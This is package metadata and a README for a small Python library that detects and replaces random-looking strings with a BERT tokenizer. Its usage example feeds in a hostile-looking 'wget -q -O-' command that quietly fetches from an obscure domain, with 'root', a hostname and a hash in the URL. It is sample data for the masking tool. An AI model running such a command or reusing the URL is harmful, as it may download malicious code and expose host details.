Metadata-Version: 2.1
Name: rsp-alamo
Version: 1.1.0
Summary: Python extension for processing random string
Home-page: https://gitee.com/alamoliuyang/rsp
Author: alamo
Author-email: 453638071@qq.com
License: MIT License
Platform: all
Classifier: Intended Audience :: Developers
Classifier: Operating System :: OS Independent
Classifier: Natural Language :: Chinese (Simplified)
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.8
Classifier: Topic :: Software Development :: Libraries
Description-Content-Type: text/markdown
License-File: LICENSE
Requires-Dist: transformers==4.33.1

# rsp-alamo
Random-string-processing - is a python module for detect random string by BertTokenizer from transformers.

# Quick start guide
You can quickly use rsp-alamo via pip-installation:
```bash
$ pip/pip3 install rsp-alamo
```

# API example
```python
from rsp.util import RspUtil
rsp_util = RspUtil()
string = "wget -q -O- http://t.jdjdcjq.top/ln/a.asp?rds_20210710*root*dclnmts02." \
         "adderucci.com*3e4812648d32b3808308784c4b69240d227f3cd97906957f65e70b962e9852f2"
print(rsp_util.replace_rs(string))
```

# Cased not covered
```bash
$ 4v~qxd#q
$ AjscE2w%x4$c
```
